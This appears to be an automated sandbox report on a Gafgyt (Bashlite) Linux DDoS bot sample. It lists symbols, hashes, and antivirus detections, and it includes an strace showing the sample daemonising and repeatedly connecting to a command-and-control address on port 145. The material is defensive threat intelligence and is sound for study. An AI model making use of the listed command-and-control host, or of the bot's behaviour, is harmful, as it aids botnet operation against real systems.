, sched_yield, , pthread_join, , __GI__rpc_dtablesize, , pthread_getconcurrency, , __GI_atoi, , fseeko64, , pthread_cond_timedwait, , __GI_sprintf, , clntudp_bufcreate, , __ctype_tolower, , __GI_svc_getreqset, , __GI_pthread_attr_getinheritsched, , sigwait, , wcrtomb, , __GI___rpc_thread_svc_max_pollfd, , pwrite, , close, , __libc_connect, , passwords, , pthread_attr_getschedparam, , srand48_r, , __GI_strlen, , sendHOLD, , mainCommSock, , pids, , vfprintf, , strpbrk, , pthread_setspecific, , xdr_int, , xdr_hyper, , getBogos, , sigsuspend, , _load_inttype, , raise, , clnt_sperrno, , free, , xdr_u_short, , sigprocmask, , __fputc_unlocked, , __GI_authnone_create, , __GI_xdr_short,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x8048168
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
117932
AVclass
gafgyt
1
VirusTotal
md5
9424e71e89434982f44698d94d527418
sha1
858d95250bf1252af5045cebd35f0e9a0e947078
SCANS (DETECTION RATE = 69.49%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20191007
version: 18.4.3895.0
detected: True check_circle

CMC
update: 20190321
version: 1.1.0.977
detected: False cancel

MAX
result: malware (ai score=97)
update: 20191008
version: 2019.9.16.1
detected: True check_circle

Bkav
update: 20191007
version: 1.3.0.10239
detected: False cancel

K7GW
result: Trojan ( 0001140e1 )
update: 20191007
version: 11.70.32201
detected: True check_circle

ALYac
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 1.1.1.5
detected: True check_circle

Avast
result: ELF:DDoS-Y [Trj]
update: 20191007
version: 18.4.3895.0
detected: True check_circle

Avira
result: LINUX/Gafgyt.snnut
update: 20191007
version: 8.3.3.8
detected: True check_circle

Baidu
update: 20190318
version: 1.0.0.2
detected: False cancel

Cyren
update: 20191007
version: 6.2.2.2
detected: False cancel

DrWeb
result: Linux.BackDoor.Fgt.44
update: 20191008
version: 7.0.41.7240
detected: True check_circle

GData
result: Linux.Trojan.Gafgyt.B
update: 20191008
version: A:25.23634B:26.16210
detected: True check_circle

Panda
update: 20191007
version: 4.6.4.2
detected: False cancel

VBA32
update: 20191007
version: 4.1.0
detected: False cancel

VIPRE
version: None
detected: False cancel

Zoner
update: 20191007
version: 1.0.0.1
detected: False cancel

ClamAV
result: Unix.Trojan.Gafgyt-6981154-0
update: 20191007
version: 0.102.0.0
detected: True check_circle

Comodo
result: Malware@#3gsltlztezpf2
update: 20191007
version: 31575
detected: True check_circle

F-Prot
update: 20191008
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.Linux.Gafgyt
update: 20191007
version: 0.1.5.2
detected: True check_circle

McAfee
result: Linux/Gafgyt.g
update: 20191008
version: 6.0.6.653
detected: True check_circle

Rising
result: Backdoor.Gafgyt/Linux!1.A512 (CLASSIC)
update: 20191008
version: 25.0.0.24
detected: True check_circle

Sophos
result: Linux/DDoS-BI
update: 20191007
version: 4.98.0
detected: True check_circle

Yandex
update: 20191007
version: 5.5.2.24
detected: False cancel

Zillya
result: Backdoor.Gafgyt.Linux.4197
update: 20191007
version: 2.0.0.3919
detected: True check_circle

Arcabit
result: Trojan.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 1.0.0.858
detected: True check_circle

FireEye
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 29.7.0.0
detected: True check_circle

TACHYON
update: 20191007
version: 2019-10-07.02
detected: False cancel

Tencent
result: Trojan.Linux.gafgyt.b
update: 20191008
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20191007
version: 2014.3.20.0
detected: False cancel

Ad-Aware
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 3.0.5.370
detected: True check_circle

AegisLab
result: Trojan.Linux.Gafgyt.4!c
update: 20191007
version: 4.2
detected: True check_circle

Emsisoft
result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
update: 20191008
version: 2018.12.0.1641
detected: True check_circle

F-Secure
result: Malware.LINUX/Gafgyt.snnut
update: 20191007
version: 12.0.86.52
detected: True check_circle

Fortinet
result: ELF/Gafgyt.BJ!tr
update: 20191008
version: 5.4.247.0
detected: True check_circle

Jiangmin
result: Backdoor.Linux.pv
update: 20191008
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20191008
version: 2013.8.14.323
detected: False cancel

Symantec
result: Trojan.Gen.NPE
update: 20191007
version: 1.10.0.0
detected: True check_circle

AhnLab-V3
result: Linux/Gafgyt.Gen17
update: 20191007
version: 3.16.3.25410
detected: True check_circle

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.d
update: 20190926
version: 3.0.0.1
detected: True check_circle

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.d
update: 20191007
version: 15.0.1.13
detected: True check_circle

MaxSecure
update: 20191007
version: 1.0.0.1
detected: False cancel

Microsoft
result: DDoS:Linux/Lightaidra
update: 20191007
version: 1.1.16400.2
detected: True check_circle

Qihoo-360
result: Win32/Trojan.a2a
update: 20191008
version: 1.0.0.1120
detected: True check_circle

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.d
update: 20191008
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Gafgyt.CF
update: 20191007
version: 20142
detected: True check_circle

TrendMicro
result: ELF_BASHLITE.DM
update: 20191007
version: 11.0.0.1006
detected: True check_circle

BitDefender
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 7.2
detected: True check_circle

K7AntiVirus
result: Trojan ( 0001140e1 )
update: 20191007
version: 11.70.32198
detected: True check_circle

SentinelOne
result: DFI - Malicious ELF
update: 20190807
version: 1.0.31.22
detected: True check_circle

Avast-Mobile
result: ELF:DDoS-S [Trj]
update: 20191007
version: 191007-00
detected: True check_circle

Malwarebytes
update: 20191007
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20191007
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
update: 20191007
version: 14.00
detected: False cancel

NANO-Antivirus
result: Trojan.Elf32.Gafgyt.efdmrq
update: 20191007
version: 1.0.134.24859
detected: True check_circle

MicroWorld-eScan
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20191007
version: 14.0.297.0
detected: True check_circle

SUPERAntiSpyware
update: 20191004
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: Linux/Gafgyt.g
update: 20191007
version: v2017.3010
detected: True check_circle

TrendMicro-HouseCall
result: ELF_BASHLITE.DM
update: 20191008
version: 10.0.0.1040
detected: True check_circle

total
59
sha256
0153c04c2a6e96149211f206ca0b96d9b9a6c17224992f349b3d6f13bb7406e2
scan_id
0153c04c2a6e96149211f206ca0b96d9b9a6c17224992f349b3d6f13bb7406e2-1570490974
resource
9424e71e89434982f44698d94d527418
positives
41
scan_date
2019-10-07 23:29:34
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291 execve("./malware", ["./malware"], [/* 15 vars */]) = 0
4291 ioctl(0, TCGETS, 0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device)
4291 ioctl(1, TCGETS, 0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device)
4291 getpid() = 4291
4291 ugetrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0
4291 setrlimit(RLIMIT_STACK, {rlim_cur=2040*1024, rlim_max=RLIM_INFINITY}) = 0
4291 rt_sigaction(SIGRTMIN, {0x8050663, [], SA_RESTORER, 0x8051f9f}, NULL, 8) = 0
4291 rt_sigaction(SIGRT_1, {0x80505d2, [RTMIN], SA_RESTORER, 0x8051f9f}, NULL, 8) = 0
4291 rt_sigaction(SIGRT_2, {0x804fdcb, [], SA_RESTORER, 0x8051f9f}, NULL, 8) = 0
4291 rt_sigprocmask(SIG_BLOCK, [RTMIN], NULL, 8) = 0
4291 rt_sigprocmask(SIG_UNBLOCK, [RT_1], NULL, 8) = 0
4291 brk(NULL) = 0x85a4000
4291 brk(0x85a5000) = 0x85a5000
4291 fork() = 4292
4291 exit(0) = ?
4292 setsid() = 4292
4292 fork( <unfinished ...>
4293 open("/dev/null", O_RDWR) = 3
4293 dup2(3, 0) = 0
4293 dup2(3, 1) = 1
4293 dup2(3, 2) = 2
4293 close(3) = 0
4293 time(NULL) = 1571351692
4293 getpid() = 4293
4293 time(NULL) = 1571351692
4293 getpid() = 4293
4293 fork( <unfinished ...>
4294 getpid() = 4294
4294 fork( <unfinished ...>
4295 getpid() = 4295
4295 setsid() = 4295
4295 chdir("/") = 0
4295 rt_sigaction(SIGPIPE, {SIG_IGN, [PIPE], SA_RESTORER|SA_RESTART, 0x8051f9f}, {SIG_DFL, [], 0}, 8) = 0
4295 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
4295 fcntl(3, F_GETFL) = 0x2 (flags O_RDWR)
4295 fcntl(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4295 connect(3, {sa_family=AF_INET, sin_port=htons(145), sin_addr=inet_addr("69.30.225.250")}, 16) = -1 EINPROGRESS (Operation now in progress)
4295 _newselect(4, NULL, [3], NULL, {30, 8} <unfinished ...>
4294 <... fork resumed> ) = 4295
4294 exit(0) = ?
4293 <... fork resumed> ) = 4294
4293 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4294, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
4293 wait4(4294, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 4294
4293 exit(0) = ?
4292 <... fork resumed> ) = 4293
4292 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4293, si_uid=1000, si_status=0, si_utime=0, si_stime=0} ---
4292 exit(0) = ?
4295 <... _newselect resumed> ) = 0 (Timeout)
4295 rt_sigprocmask(SIG_BLOCK, [CHLD], [RTMIN], 8) = 0
4295 rt_sigaction(SIGCHLD, NULL, {SIG_DFL, [], 0}, 8) = 0
4295 rt_sigprocmask(SIG_SETMASK, [RTMIN], NULL, 8) = 0
4295 nanosleep({5, 1571351692}, 0xfffbfa24) = 0
4295 close(3) = 0
4295 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
4295 fcntl(3, F_GETFL) = 0x2 (flags O_RDWR)
4295 fcntl(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4295 connect(3, {sa_family=AF_INET, sin_port=htons(145), sin_addr=inet_addr("69.30.225.250")}, 16) = -1 EINPROGRESS (Operation now in progress)
4295 _newselect(4, NULL, [3], NULL, {30, 8} <unfinished ...>

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Success

Strace
Success

Results
True check_circle

DNS
Query

Response

TCP
Info
localhost:57426 -> 69.30.225.250:145
localhost:57424 -> 69.30.225.250:145

UDP
Info
computer localhost:5353 arrow_forward help_outline 224.0.0.251:5353

HTTP
Info

Summary
DNS
False cancel

TCP
True check_circle

UDP
True check_circle

HTTP
False cancel

Binary
RF
confidence: 100.00%
suspicious: True check_circle
MLP
confidence: 99.98%
suspicious: True check_circle
SVM
confidence: 98.80%
suspicious: True check_circle